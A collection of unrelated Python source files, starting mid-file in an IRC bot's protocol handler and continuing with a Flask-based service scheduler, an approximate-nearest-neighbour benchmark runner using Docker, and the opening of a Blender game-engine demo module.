log.exception('socket.recv threw an exception')
self.reconnect(5)
return
if data == b'':
if self.quitting:
log.info('received empty binary data, but quitting, so exiting loop')
return
else:
raise IRCSocketError('Received empty binary data')
for msg in botologist.util.decode_lines(data):
if not msg:
continue
log.debug('[recv] %r', msg)
if self.quitting and msg.startswith('ERROR :'):
log.info('received an IRC ERROR, but quitting, so exiting loop')
return
self.handle_msg(msg)
def join_channel(self, channel):
assert isinstance(channel, Channel)
log.info('Joining channel: %s', channel.name)
self.channels[channel.name] = channel
self.send('JOIN ' + channel.name)
def handle_msg(self, msg):
words = msg.split()
if words[0] == 'PING':
self.reset_ping_timer()
self.send('PONG ' + words[1])
elif words[0] == 'ERROR':
if ':Your host is trying to (re)connect too fast -- throttled' in msg:
log.warning('Throttled for (re)connecting too fast')
self.reconnect(60)
else:
log.warning('Received error: %s', msg)
self.reconnect(10)
elif '600' > words[0] > '400':
log.warning('Received error reply: %s', msg)
elif len(words) > 1:
try:
nick, host, _ = User.split_ircformat(words[0])
except:
nick = host = None
# welcome message, lets us know that we're connected
if words[1] == '001':
for callback in self.on_connect:
callback()
elif words[1] == 'PONG':
self.reset_ping_timer()
elif words[1] == 'JOIN':
channel = words[2]
user = User.from_ircformat(words[0])
log.debug('User %s (%s @ %s) joined channel %s',
user.nick, user.ident, user.host, channel)
if user.nick == self.nick:
self.send('WHO '+channel)
else:
self.channels[words[2]].add_user(user)
for callback in self.on_join:
callback(self.channels[words[2]], user)
# response to WHO command
elif words[1] == '352':
channel = self.channels[words[3]]
host = words[5]
nick = words[7]
if not channel.find_user(identifier=host, name=nick):
ident = words[4]
user = User(nick, host, ident)
channel.add_user(user)
elif words[1] == 'NICK':
new_nick = words[2][1:]
log.debug('User %s changing nick: %s', host, new_nick)
for channel in self.channels.values():
channel_user = channel.find_user(identifier=host)
if channel_user:
log.debug('Updating nick for user %r in channel %s',
channel_user, channel.name)
channel_user.name = new_nick
elif words[1] == 'PART':
channel = self.channels[words[2]]
log.debug('User %s parted from channel %s', host, channel)
channel.remove_user(name=nick, identifier=host)
elif words[1] == 'KICK':
channel = self.channels[words[2]]
user = _find_user(channel, host, nick)
kicked_nick = words[3]
kicked_user = _find_user(channel, None, kicked_nick)
log.debug('User %s was kicked by %s from channel %s',
kicked_nick, user.nick, channel.channel)
channel.remove_user(name=kicked_nick)
for callback in self.on_kick:
callback(channel, kicked_user, user)
if kicked_nick == self.nick:
self.join_channel(channel)
elif words[1] == 'QUIT':
log.debug('User %s!%s quit', nick, host)
for channel in self.channels.values():
channel.remove_user(name=nick, identifier=host)
elif words[1] == 'PRIVMSG':
channel = self.channels.get(words[2])
user = _find_user(channel, host, nick)
message = Message.from_privmsg(msg, user)
message.channel = channel
if not message.is_private:
message.channel = self.channels[message.target]
if not user:
log.debug('Unknown user %s (%s) added to channel %s',
user.nick, user.host, message.target)
self.channels[message.target].add_user(user)
for callback in self.on_privmsg:
callback(message)
def send_msg(self, target, message):
if message is None:
return
if target in self.channels:
if not self.channels[target].allow_colors:
message = botologist.util.strip_irc_formatting(message)
if isinstance(message, str):
message = message.split('\n')
for privmsg in message:
self.send('PRIVMSG ' + target + ' :' + privmsg)
def send(self, msg):
if len(msg) > self.MAX_MSG_CHARS:
log.warning('Message too long (%d characters), upper limit %d',
len(msg), self.MAX_MSG_CHARS)
msg = msg[:(self.MAX_MSG_CHARS - 3)] + '...'
log.debug('[send] %s', repr(msg))
self.irc_socket.send(msg + '\r\n')
def stop(self, reason='Leaving'):
for callback in self.on_disconnect:
callback()
if self.reconnect_timer:
log.info('Aborting reconnect timer')
self.reconnect_timer.cancel()
self.reconnect_timer = None
return
if self.ping_timer:
self.ping_timer.cancel()
self.ping_timer = None
if self.ping_response_timer:
self.ping_response_timer.cancel()
self.ping_response_timer = None
if not self.irc_socket:
log.warning('Tried to quit, but irc_socket is None')
return
log.info('Quitting, reason: %s', reason)
self.quitting = True
self.send('QUIT :' + reason)
def reset_ping_timer(self):
if self.ping_response_timer:
self.ping_response_timer.cancel()
self.ping_response_timer = None
if self.ping_timer:
self.ping_timer.cancel()
self.ping_timer = None
self.ping_timer = threading.Timer(
self.PING_EVERY,
self._wrap_error_handler(self.send_ping),
)
self.ping_timer.start()
def send_ping(self):
if self.ping_response_timer:
log.warning('Already waiting for PONG, cannot send another PING')
return
self.send('PING ' + self.server.host)
self.ping_response_timer = threading.Timer(
self.PING_TIMEOUT,
self._wrap_error_handler(self.handle_ping_timeout),
)
self.ping_response_timer.start()
def handle_ping_timeout(self):
log.warning('Ping timeout')
self.ping_response_timer = None
self.reconnect()
class User(botologist.protocol.User):
def __init__(self, nick, host=None, ident=None):
if host and '@' in host:
ident, host = host.split('@')
self.host = host
if ident and ident[0] == '~':
ident = ident[1:]
self.ident = ident
super().__init__(nick, host)
@staticmethod
def split_ircformat(string):
if string[0] == ':':
string = string[1:]
parts = string.split('!')
nick = parts[0]
ident, host = parts[1].split('@')
return (nick, host, ident)
@classmethod
def from_ircformat(cls, string):
nick, host, ident = cls.split_ircformat(string)
return cls(nick, host, ident)
def __repr__(self):
return '<botologist.protocol.irc.User "{}!{}@{}" at {}>'.format(
self.name, self.ident, self.host, hex(id(self)))
class Message(botologist.protocol.Message):
def __init__(self, user, target, message):
if not isinstance(user, User):
user = User.from_ircformat(user)
super().__init__(message, user, target)
self.is_private = self.target[0] != '#'
@classmethod
def from_privmsg(cls, msg, user=None):
words = msg.split()
return cls(user or words[0][1:], words[2], ' '.join(words[3:])[1:])
class Server:
def __init__(self, address, ssl=False):
parts = address.split(':')
self.host = parts[0]
if len(parts) > 1:
self.port = int(parts[1])
else:
self.port = 6667
self.ssl = ssl
class ServerPool:
def __init__(self, servers=None):
self.index = 0
self.servers = []
if servers:
for server in servers:
self.add_server(server)
def add_server(self, server):
assert isinstance(server, Server)
self.servers.append(server)
def get(self):
server = self.servers[self.index]
self.index += 1
if self.index >= len(self.servers):
self.index = 0
return server
class Channel(botologist.protocol.Channel):
def __init__(self, name):
if name[0] != '#':
name = '#' + name
super().__init__(name)
self.allow_colors = True
def find_nick_from_host(self, host):
if '@' in host:
host = host[host.index('@')+1:]
user = self.find_user(identifier=host)
if user:
return user.name
def find_host_from_nick(self, nick):
user = self.find_user(name=nick)
if user:
return user.host
def remove_user(self, user=None, name=None, identifier=None):
if not user and identifier and '@' in identifier:
identifier = identifier[identifier.index('@')+1:]
return super().remove_user(user=user, name=name, identifier=identifier)
class IRCSocketError(OSError):
pass
class IRCSocket:
def __init__(self, server):
self.server = server
self.socket = None
self.ssl_context = None
if self.server.ssl:
# https://docs.python.org/3/library/ssl.html#protocol-versions
self.ssl_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
self.ssl_context.options |= ssl.OP_NO_SSLv2 # pylint: disable=no-member
self.ssl_context.options |= ssl.OP_NO_SSLv3 # pylint: disable=no-member
self.ssl_context.verify_mode = ssl.CERT_REQUIRED
self.ssl_context.check_hostname = True
self.ssl_context.load_default_certs()
def connect(self):
log.debug('Looking up address info for %s:%s',
self.server.host, self.server.port)
addrinfo = socket.getaddrinfo(
self.server.host, self.server.port,
socket.AF_UNSPEC, socket.SOCK_STREAM
)
for res in addrinfo:
af, socktype, proto, canonname, address = res
try:
self.socket = socket.socket(af, socktype, proto)
except OSError:
log.warning('uncaught exception while initialising socket', exc_info=True)
self.socket = None
continue
if self.server.ssl:
log.debug('server is using SSL')
self.socket = self.ssl_context.wrap_socket(
self.socket, server_hostname=self.server.host)
try:
self.socket.settimeout(10)
log.debug('Trying to connect to %s:%s', address[0], address[1])
self.socket.connect(address)
except OSError:
log.warning('uncaught exception while connecting to socket', exc_info=True)
self.close()
continue
# if we reach this point, the socket has been successfully created,
# so break out of the loop
break
if self.socket is None:
raise IRCSocketError('Could not open socket')
self.socket.settimeout(None)
def recv(self, bufsize=4096):
data = self.socket.recv(bufsize)
# 13 = \r -- 10 = \n
while data != b'' and (data[-1] != 10 and data[-2] != 13):
data += self.socket.recv(bufsize)
return data
def send(self, data):
if isinstance(data, str):
data = data.encode('utf-8')
self.socket.send(data)
def close(self):
try:
self.socket.shutdown(socket.SHUT_RDWR)
except OSError:
# shutdown will fail if the socket has already been closed by the
# server, which will happen if we get throttled for example
pass
self.socket.close()
self.socket = None
|
scheduler.py
|
import schedule
import time
import threading
from random import randrange
import json
from flask import Flask,request,jsonify
import random
import json
import requests
import argparse
from datetime import datetime
import pickle
app = Flask(__name__)
service_life_cycle_ip = "127.0.0.1"
service_life_cycle_port = 8080
Myport = 5053
DUMPING_DELAY_IN_3_SECS = 1
def time_add(time,minutes_to_add) :
hr = int(str(time).split(":")[0])
mn = int(str(time).split(":")[1])
mn = (mn+minutes_to_add)
hr = (hr + int(mn/60))%24
mn=mn%60
hr = str(hr)
mn = str(mn)
if(len(hr)==1):
hr="0"+hr
if(len(mn)==1):
mn="0"+mn
return hr+":"+mn
class Scheduler:
def __init__(self):
self.job_dict = {}
self.main_service_id_dict={}
self.single_instances ={} #
self.started = {} #done
self.loop_schedules=[] #done
self.main_id_sch_id={}
def pending_jobs(self):
while True:
schedule.run_pending()
time.sleep(10)
def send_request_to_service_life_cyle(self,username,application_id,service_name,service_instance_id,type_):
response = {"username":username,"applicationname":application_id,"servicename":service_name,"serviceId":self.main_service_id_dict[service_instance_id]}
print(response)
if type_=="start":
res = requests.post('http://'+service_life_cycle_ip+':'+str(service_life_cycle_port)+'/servicelcm/service/start', json=response)
else:
res = requests.post('http://'+service_life_cycle_ip+':'+str(service_life_cycle_port)+'/servicelcm/service/stop', json=response)
def run(self):
t1 = threading.Thread(target=self.pending_jobs)
t1.start()
def exit_service(self,service_instance_id):
service_instance_id,username,application_id,service_name = service_instance_id[0],service_instance_id[1],service_instance_id[2],service_instance_id[3]
print("+MSG TO SLCM TO STOP \t\t",service_instance_id)
#send request to service life cycle manager to cancel service
self.send_request_to_service_life_cyle(username,application_id,service_name,service_instance_id,"stop")
del self.started[service_instance_id]
schedule.cancel_job(self.job_dict[service_instance_id])
# del self.job_dict[service_instance_id]
def run_service(self,service_detail):
username,application_id,service_name,end,service_instance_id = service_detail[0],service_detail[1],service_detail[2],service_detail[3],service_detail[4]
print("+MSG TO SLCM TO START \t\t",service_instance_id)
#send request to service life cycle manager to start service
self.send_request_to_service_life_cyle(username,application_id,service_name,service_instance_id,"start")
data = {
"service_id": service_instance_id,
"username":username,
"application_id":application_id,
"service_name":service_name,
"end":end
}
self.started[service_instance_id]=data
job_id = schedule.every().day.at(end).do(self.exit_service,((service_instance_id,username,application_id,service_name)))
self.job_dict[service_instance_id]=job_id
def run_service_period(self,service_detail):
username,application_id,service_name,end,service_instance_id = service_detail[0],service_detail[1],service_detail[2],service_detail[3],service_detail[4]
print("+MSG TO SLCM TO START \t\t",service_instance_id)
#send request to service life cycle manager to start service
self.send_request_to_service_life_cyle(username,application_id,service_name,service_instance_id,"start")
now = datetime.now()
current_time = now.strftime("%H:%M")
end_time = time_add(current_time,int(end))
data = {
"service_id": service_instance_id,
"username":username,
"application_id":application_id,
"service_name":service_name,
"end":end_time
}
self.started[service_instance_id]=data
job_id = schedule.every().day.at(end_time).do(self.exit_service,((service_instance_id,username,application_id,service_name)))
self.job_dict[service_instance_id]=job_id
def run_service_once(self,service_detail):
username,application_id,service_name,end,service_instance_id = service_detail[0],service_detail[1],service_detail[2],service_detail[3],service_detail[4]
print("+MSG TO SLCM TO START \t\t",service_instance_id)
#send request to service life cycle manager to start service
self.send_request_to_service_life_cyle(username,application_id,service_name,service_instance_id,"start")
data = {
"service_id": service_instance_id,
"username":username,
"application_id":application_id,
"service_name":service_name,
"end":end
}
self.started[service_instance_id]=data
if(service_instance_id in self.single_instances.keys()):
del self.single_instances[service_instance_id]
job_id = schedule.every().day.at(end).do(self.exit_service,((service_instance_id,username,application_id,service_name)))
try:
if(self.job_dict[service_instance_id]):
print("here")
schedule.cancel_job(self.job_dict[service_instance_id])
except:
pass
self.job_dict[service_instance_id]=job_id
def stop_all_started_at_their_end_time(self):
for key in self.started.keys():
service_instance_id,username,application_id,service_name,end = self.started[key]["service_id"],self.started[key]["username"],self.started[key]["application_id"],self.started[key]["service_name"],self.started[key]["end"]
job_id = schedule.every().day.at(end).do(self.exit_service,((service_instance_id,username,application_id,service_name)))
self.job_dict[service_instance_id]=job_id
# del self.started[service_instance_id]
self.main_service_id_dict[service_instance_id] = username+"_"+application_id+"_"+service_name
self.main_id_sch_id[username+"_"+application_id+"_"+service_name]=service_instance_id
def schedule(self,request_,s_id=None):
username = request_["username"]
application_id = request_["application_id"]
service_name = request_["service_name"]
single_instance = request_["singleinstance"]
day = request_["day"]
start_time = request_["start_time"]
end = request_["end_time"]
period = request_["period"]
# service_instance_id=username+"_"+application_id+"_"+service_name+"_"+str(randrange(10000))
main_service_id = username+"_"+application_id+"_"+service_name
service_instance_id = s_id
if service_instance_id is None:
service_instance_id=username+"_"+application_id+"_"+service_name+"_"+str(randrange(10000))
self.main_service_id_dict[service_instance_id]=main_service_id
self.main_id_sch_id[main_service_id] = service_instance_id
result = "OK"
if(str(single_instance)=="True"):
print("single instance ",bool(single_instance))
if(start_time=="NOW" and day is None):
self.run_service_once((username,application_id,service_name,end,service_instance_id))
elif day is not None and start_time!="NOW":
self.single_instances[service_instance_id]=request_
job_id = None
if(day=="monday"):
job_id = schedule.every().monday.at(start_time).do( self.run_service_once,((username,application_id,service_name,end,service_instance_id)))
elif(day=="tuesday"):
job_id = schedule.every().tuesday.at(start_time).do( self.run_service_once,((username,application_id,service_name,end,service_instance_id)))
elif(day=="wednesday"):
job_id = schedule.every().wednesday.at(start_time).do( self.run_service_once,((username,application_id,service_name,end,service_instance_id)))
elif(day=="thursday"):
job_id = schedule.every().thursday.at(start_time).do( self.run_service_once,((username,application_id,service_name,end,service_instance_id)))
elif(day=="friday"):
job_id = schedule.every().friday.at(start_time).do( self.run_service_once,((username,application_id,service_name,end,service_instance_id)))
elif(day=="saturday"):
job_id = schedule.every().saturday.at(start_time).do( self.run_service_once,((username,application_id,service_name,end,service_instance_id)))
else:
job_id = schedule.every().sunday.at(start_time).do( self.run_service_once,((username,application_id,service_name,end,service_instance_id)))
self.job_dict[service_instance_id]=job_id
else:
self.single_instances[service_instance_id]=request_
job_id = schedule.every().day.at(start_time).do( self.run_service_once,((username,application_id,service_name,end,service_instance_id)))
self.job_dict[service_instance_id]=job_id
elif day is None and period is not None:
self.loop_schedules.append({"service_id":service_instance_id,"request": request_})
interval = period["interval"]
end = period["length"]
job_id = schedule.every(interval).minutes.do( self.run_service_period,((username,application_id,service_name,end,service_instance_id)))
self.job_dict[service_instance_id]=job_id
elif day is not None:
self.loop_schedules.append({"service_id":service_instance_id,"request": request_})
if(day=="monday"):
job_id = schedule.every().monday.at(start_time).do( self.run_service,((username,application_id,service_name,end,service_instance_id)))
elif(day=="tuesday"):
job_id = schedule.every().tuesday.at(start_time).do( self.run_service,((username,application_id,service_name,end,service_instance_id)))
elif(day=="wednesday"):
job_id = schedule.every().wednesday.at(start_time).do( self.run_service,((username,application_id,service_name,end,service_instance_id)))
elif(day=="thursday"):
job_id = schedule.every().thursday.at(start_time).do( self.run_service,((username,application_id,service_name,end,service_instance_id)))
elif(day=="friday"):
job_id = schedule.every().friday.at(start_time).do( self.run_service,((username,application_id,service_name,end,service_instance_id)))
elif(day=="saturday"):
job_id = schedule.every().saturday.at(start_time).do( self.run_service,((username,application_id,service_name,end,service_instance_id)))
else:
job_id = schedule.every().sunday.at(start_time).do( self.run_service,((username,application_id,service_name,end,service_instance_id)))
else:
result = "ERROR : wrong scheduling format"
return result,service_instance_id
def GetDict(services):
d={}
for _ in services:
d[_]=False
return d
def ConstructDict(data):
forward_dict={}
backward_dict={}
for _ in data.keys():
forward_dict[_]=data[_]["servicename"]
for key,values in forward_dict.items():
backward_dict[values]=key
return forward_dict,backward_dict
def Make_Data(username,application_id,service_name,start_time=None,end_time=None,singleinstance=False,day=None,period=None):
data_dict={"username":username,"application_id":application_id,"service_name":service_name,"singleinstance":singleinstance,"day":day,"start_time":start_time,"end_time":end_time,"period":period}
return data_dict
def GetServices(data,all_services):
services=[]
for _ in all_services:
if(data[_]["scheduled"]=="True"):
services.append(_)
return services
def Convert(data):
return_data=[]
username=data["Application"]["username"]
application_id=data["Application"]["applicationname"]
all_services=list(data["Application"]["services"].keys())
services=GetServices(data["Application"]["services"],all_services)
forward_dict,backward_dict=ConstructDict(data["Application"]["services"])
# print(forward_dict)
# print(backward_dict)
# print(services)
for service in services:
# if(service!="service-1"):
# continue
bool_dict=GetDict(all_services)
bool_dict[service]=True
order_dependency=[]
stack=[]
stack.append(service)
while(len(stack) > 0):
# print(order_dependency)
temp=stack.pop()
if(temp!=service):
order_dependency.append(temp)
curr_dep=data["Application"]["services"][temp]["dependency"]
for _ in curr_dep:
if(not bool_dict[backward_dict[_]]):
stack.append(backward_dict[_])
bool_dict[backward_dict[_]]=True
order_dependency=order_dependency[::-1]
order_dependency.append(service)
# print(order_dependency)
if(data["Application"]["services"][service]["period"]!="None"):
for service_dep in order_dependency:
return_data.append(Make_Data(username=username,application_id=application_id,service_name=forward_dict[service_dep],singleinstance="False",period=data["Application"]["services"][service]["period"]))
else:
times=[]
days=[]
flags=[True,True]
if "time" in data["Application"]["services"][service].keys():
times=[(s,e) for s,e in zip(data["Application"]["services"][service]["time"]["start"],data["Application"]["services"][service]["time"]["end"])]
else:
times.append((None,None))
flags[0]=False
if "days" in data["Application"]["services"][service].keys():
days=[_ for _ in data["Application"]["services"][service]["days"]]
else:
days.append(None)
flags[1]=False
if(data["Application"]["services"][service]["singleinstance"]) or flags[1]:
for service_dep in order_dependency:
for day in days:
for time in times:
return_data.append(Make_Data(username=username,application_id=application_id,service_name=forward_dict[service_dep],singleinstance=data["Application"]["services"][service]["singleinstance"],start_time=time[0],end_time=time[1],day=day))
else:
for service_dep in order_dependency:
for time in times:
return_data.append(Make_Data(username=username,application_id=application_id,service_name=forward_dict[service_dep],singleinstance=data["Application"]["services"][service]["singleinstance"],start_time=time[0],end_time=time[1]))
return return_data
def ChangeData(data,name):
for _ in data["Application"]["services"].keys():
if(_ != name):
data["Application"]["services"][_]["scheduled"]="False"
else:
data["Application"]["services"][_]["scheduled"]="True"
del data["Application"]["services"][_]["days"]
data["Application"]["services"][_]["time"]["start"]=["NOW"]
data["Application"]["services"][_]["time"]["end"]=["23:45"]
return data
@app.route('/schedule_service', methods=['GET', 'POST'])
def schedule_service():
content = request.get_json()
res = "OK"
print(content)
print(type(content))
if(content["action"]=="Stop"):
id_ = content["config"]["Application"]["username"]+"_"+content["config"]["Application"]["applicationname"]+"_"+content["config"]["Application"]["services"][content["servicename"]]["servicename"]
response = {"username":content["config"]["Application"]["username"],"applicationname":content["config"]["Application"]["applicationname"],"servicename":content["config"]["Application"]["services"][content["servicename"]]["servicename"],"serviceId":id_}
print(response)
print(type(response))
service_instance_id = sch.main_id_sch_id[id_]
del sch.started[service_instance_id]
schedule.cancel_job(sch.job_dict[service_instance_id])
res = requests.post('http://'+service_life_cycle_ip+':'+str(service_life_cycle_port)+'/servicelcm/service/stop', json=response)
print("+MSG TO SLCM TO STOP ",id_)
else:
if(content["action"]=="Start"):
print("start")
content["config"]=ChangeData(content["config"],content["servicename"])
# print(content["config"])
extracted_requests = Convert(content["config"])
# print(extracted_requests)
for scheduling_request in extracted_requests:
print("+ RECEIVED REQUEST")
print("\t\t ",scheduling_request,"\n")
result,service_id = sch.schedule(scheduling_request)
if(result!="OK"):
res="ERROR : wrong scheduling format"
return {"result":res}
sch = None
def dumping_thread():
global sch
minutes=0
while True:
time.sleep(3)
minutes+=1
if minutes%DUMPING_DELAY_IN_3_SECS==0:
print("+ Started ",minutes/6," minutes ago")
print("+ DUMPING DETAILS")
print("\t- Single Instance Schedules")
print("\n\t\t",sch.single_instances)
print("\t- Started")
print("\n\t\t",sch.started)
print("\t- Schedules")
print("\n\t\t",sch.loop_schedules)
print("\n")
print("+ DUMPING DETAILS END")
data = {"single_instance":sch.single_instances,
"started":sch.started,
"schedules":sch.loop_schedules
# "main_service_id_dict":self.main_service_id_dict
}
pickle_out = open("/home/sch_data.pickle","wb")
pickle.dump(data, pickle_out)
pickle_out.close()
if __name__ == "__main__":
# ap = argparse.ArgumentParser()
# ap.add_argument("-p","--port",required=True)
# ap.add_argument("-i","--service_life_cycle_ip",required=True)
# ap.add_argument("-x","--service_life_cycle_port",required=True)
# args = vars(ap.parse_args())
# service_life_cycle_ip = args["service_life_cycle_ip"]
# service_life_cycle_port = int(args["service_life_cycle_port"])
# Myport = args["port"]
sch = Scheduler()
sch.run()
'''
retrieve data from logging service
sch.started = data["started"] #dictionary
sch.loop_schedules = data["schedules"] #list
sch.single_instances = data["single_instance"] #dictionary
sch.main_service_id_dict = data["main_service_id_dict"] #dictionary
sch.stop_all_started_at_their_end_time()
for key in sch.singleinstances.keys():
sch.schedule(sch.single_instances[key])
for request in sch.loop_schedules:
sch.schedule(request)
#it covers both single instance and non single instances
'''
try:
dbfile = open("/home/sch_data.pickle","rb")
db = pickle.load(dbfile)
schedules_ = db["schedules"]
started = db["started"]
single_instances = db["single_instance"]
sch.loop_schedules == schedules_
sch.single_instances = single_instances
sch.started = started
for schedue in schedules_:
single_instance_id = schedue["service_id"]
request_ = schedue["request"]
sch.schedule(request_,single_instance_id)
for key in single_instances.keys():
sch.schedule(single_instances[key],key)
sch.stop_all_started_at_their_end_time()
except:
print("NO PREVIOUS DATA")
t2 = threading.Thread(target=dumping_thread)
t2.start()
app.run(debug=False,host="0.0.0.0",port=int(Myport))
|
runner.py
|
import argparse
import datetime
import colors
import docker
import json
import multiprocessing
import numpy
import os
import psutil
import requests
import sys
import threading
import time
import traceback
from ann_benchmarks.datasets import get_dataset, DATASETS
from ann_benchmarks.algorithms.definitions import (Definition,
instantiate_algorithm,
get_algorithm_name)
from ann_benchmarks.distance import metrics, dataset_transform
from ann_benchmarks.results import store_results
def run_individual_query(algo, X_train, X_test, distance, count, run_count,
batch):
prepared_queries = \
(batch and hasattr(algo, "prepare_batch_query")) or \
((not batch) and hasattr(algo, "prepare_query"))
best_search_time = float('inf')
for i in range(run_count):
print('Run %d/%d...' % (i + 1, run_count))
# a bit dumb but can't be a scalar since of Python's scoping rules
n_items_processed = [0]
def single_query(v):
if prepared_queries:
algo.prepare_query(v, count)
start = time.time()
algo.run_prepared_query()
total = (time.time() - start)
candidates = algo.get_prepared_query_results()
else:
start = time.time()
candidates = algo.query(v, count)
total = (time.time() - start)
candidates = [(int(idx), float(metrics[distance]['distance'](v, X_train[idx]))) # noqa
for idx in candidates]
n_items_processed[0] += 1
if n_items_processed[0] % 1000 == 0:
print('Processed %d/%d queries...' %
(n_items_processed[0], len(X_test)))
if len(candidates) > count:
print('warning: algorithm %s returned %d results, but count'
' is only %d)' % (algo, len(candidates), count))
return (total, candidates)
def batch_query(X):
if prepared_queries:
algo.prepare_batch_query(X, count)
start = time.time()
algo.run_batch_query()
total = (time.time() - start)
else:
start = time.time()
algo.batch_query(X, count)
total = (time.time() - start)
results = algo.get_batch_results()
candidates = [[(int(idx), float(metrics[distance]['distance'](v, X_train[idx]))) # noqa
for idx in single_results]
for v, single_results in zip(X, results)]
return [(total / float(len(X)), v) for v in candidates]
if batch:
results = batch_query(X_test)
else:
results = [single_query(x) for x in X_test]
total_time = sum(time for time, _ in results)
total_candidates = sum(len(candidates) for _, candidates in results)
search_time = total_time / len(X_test)
avg_candidates = total_candidates / len(X_test)
best_search_time = min(best_search_time, search_time)
verbose = hasattr(algo, "query_verbose")
attrs = {
"batch_mode": batch,
"best_search_time": best_search_time,
"candidates": avg_candidates,
"expect_extra": verbose,
"name": str(algo),
"run_count": run_count,
"distance": distance,
"count": int(count)
}
additional = algo.get_additional()
for k in additional:
attrs[k] = additional[k]
return (attrs, results)
def run(definition, dataset, count, run_count, batch):
algo = instantiate_algorithm(definition)
assert not definition.query_argument_groups \
or hasattr(algo, "set_query_arguments"), """\
error: query argument groups have been specified for %s.%s(%s), but the \
algorithm instantiated from it does not implement the set_query_arguments \
function""" % (definition.module, definition.constructor, definition.arguments)
D = get_dataset(dataset)
X_train = numpy.array(D['train'])
X_test = numpy.array(D['test'])
distance = D.attrs['distance']
print('got a train set of size (%d * %d)' % X_train.shape)
print('got %d queries' % len(X_test))
X_train = dataset_transform[distance](X_train)
X_test = dataset_transform[distance](X_test)
try:
prepared_queries = False
if hasattr(algo, "supports_prepared_queries"):
prepared_queries = algo.supports_prepared_queries()
t0 = time.time()
memory_usage_before = algo.get_memory_usage()
algo.fit(X_train)
build_time = time.time() - t0
index_size = algo.get_memory_usage() - memory_usage_before
print('Built index in', build_time)
print('Index size: ', index_size)
query_argument_groups = definition.query_argument_groups
# Make sure that algorithms with no query argument groups still get run
# once by providing them with a single, empty, harmless group
if not query_argument_groups:
query_argument_groups = [[]]
for pos, query_arguments in enumerate(query_argument_groups, 1):
print("Running query argument group %d of %d..." %
(pos, len(query_argument_groups)))
if query_arguments:
algo.set_query_arguments(*query_arguments)
descriptor, results = run_individual_query(
algo, X_train, X_test, distance, count, run_count, batch)
descriptor["build_time"] = build_time
descriptor["index_size"] = index_size
descriptor["algo"] = get_algorithm_name(
definition.algorithm, batch)
descriptor["dataset"] = dataset
store_results(dataset, count, definition,
query_arguments, descriptor, results, batch)
finally:
algo.done()
def run_from_cmdline():
parser = argparse.ArgumentParser()
parser.add_argument(
'--dataset',
choices=DATASETS.keys(),
required=True)
parser.add_argument(
'--algorithm',
required=True)
parser.add_argument(
'--module',
required=True)
parser.add_argument(
'--constructor',
required=True)
parser.add_argument(
'--count',
required=True,
type=int)
parser.add_argument(
'--runs',
required=True,
type=int)
parser.add_argument(
'--batch',
action='store_true')
parser.add_argument(
'build')
parser.add_argument(
'queries',
nargs='*',
default=[])
args = parser.parse_args()
algo_args = json.loads(args.build)
query_args = [json.loads(q) for q in args.queries]
definition = Definition(
algorithm=args.algorithm,
docker_tag=None, # not needed
module=args.module,
constructor=args.constructor,
arguments=algo_args,
query_argument_groups=query_args,
disabled=False
)
run(definition, args.dataset, args.count, args.runs, args.batch)
def run_docker(definition, dataset, count, runs, timeout, batch, cpu_limit,
mem_limit=None):
cmd = ['--dataset', dataset,
'--algorithm', definition.algorithm,
'--module', definition.module,
'--constructor', definition.constructor,
'--runs', str(runs),
'--count', str(count)]
if batch:
cmd += ['--batch']
cmd.append(json.dumps(definition.arguments))
cmd += [json.dumps(qag) for qag in definition.query_argument_groups]
client = docker.from_env()
if mem_limit is None:
mem_limit = psutil.virtual_memory().available
print('Creating container: CPU limit %s, mem limit %s, timeout %d, command %s' % (cpu_limit, mem_limit, timeout, cmd))
container = client.containers.run(
definition.docker_tag,
cmd,
volumes={
os.path.abspath('ann_benchmarks'):
{'bind': '/home/app/ann_benchmarks', 'mode': 'ro'},
os.path.abspath('data'):
{'bind': '/home/app/data', 'mode': 'ro'},
os.path.abspath('results'):
{'bind': '/home/app/results', 'mode': 'rw'},
},
cpuset_cpus=cpu_limit,
mem_limit=mem_limit,
detach=True)
def stream_logs():
for line in container.logs(stream=True):
print(colors.color(line.decode().rstrip(), fg='blue'))
t = threading.Thread(target=stream_logs, daemon=True)
t.start()
try:
exit_code = container.wait(timeout=timeout)
# Exit if exit code
if exit_code not in [0, None]:
print(colors.color(container.logs().decode(), fg='red'))
print('Child process raised exception %d' % exit_code)
except:
print('Container.wait failed with exception')
traceback.print_exc()
finally:
container.remove(force=True)
|
text.py
|
#!/usr/bin/python
# (c) 2018 Jim Hawkins. MIT licensed, see https://opensource.org/licenses/MIT
# Part of Blender Driver, see https://github.com/sjjhsjjh/blender-driver
"""Python module for Blender Driver demonstration application.
This module can only be used from within the Blender Game Engine."""
# Exit if run other than as a module.
if __name__ == '__main__':
print(__doc__)
raise SystemExit(1)
# Standard library imports, in alphabetic order.
#
# Module for command line switches.
# https://docs.python.org/3.5/library/argparse.html
# The import isn't needed because this class uses the base class to get an
# object.
# import argparse
#
# Module for levelled logging messages.
# Tutorial is here: https://docs.python.org/3.5/howto/logging.html
# Reference is here: https://docs.python.org/3.5/library/logging.html
import logging
from logging import DEBUG, INFO, WARNING, ERROR, log
#
# Module for degrees to radians conversion.
# https://docs.python.org/3.5/library/math.html#math.radians
from math import radians
#
# This module uses Thread and Lock classes.
# https://docs.python.org/3.4/library/threading.html#thread-objects
import threading
#
# Module for logging current time and sleep.
# https://docs.python.org/3.5/library/time.html
import time
#
# Third party modules, in alphabetic order.
#
# Blender library imports, in alphabetic order.
#
# These modules can only be imported if running from within Blender.
try:
# Main Blender Python interface.
# Import isn't needed because the base class keeps a reference to the
# interface object.
# import bpy
#
# Blender Game Engine KX_GameObject
# Import isn't needed because this class gets an object that has been
# created elsewhere.
# https://www.blender.org/api/blender_python_api_current/bge.types.KX_GameObject.html
#
# Blender Game Engine maths utilities, which can only be imported if running
# from within the Blender Game Engine.
# http://www.blender.org/api/blender_python_api_current/mathutils.html
# This class gets a Vector from the bpy layer, so Vector needn't be
# imported.
from mathutils import Matrix
#
# Font Drawing module, used to get text width.
# https://docs.blender.org/api/blender_python_api_current/blf.html
import blf
except ImportError as error:
print(__doc__)
print(error)
# Local imports.
#
# Blender Driver application with threads and locks.
from . import demonstration
# Diagnostic print to show when it's imported, if all its own imports run OK.
print("".join(('Application module "', __name__, '" ')))
class Application(demonstration.Application):
templates = {
'text': {'text':".\n.", 'physicsType':'NO_COLLISION'
, 'location': (0, 0, -1)},
'smalltext': {'text':"0\n0", 'physicsType':'NO_COLLISION'
, 'scale':(0.5, 0.5, 0.5)},
'cube': {'subtype':'Cube', 'physicsType':'NO_COLLISION'
, 'scale':(0.1, 0.1, 0.1) },
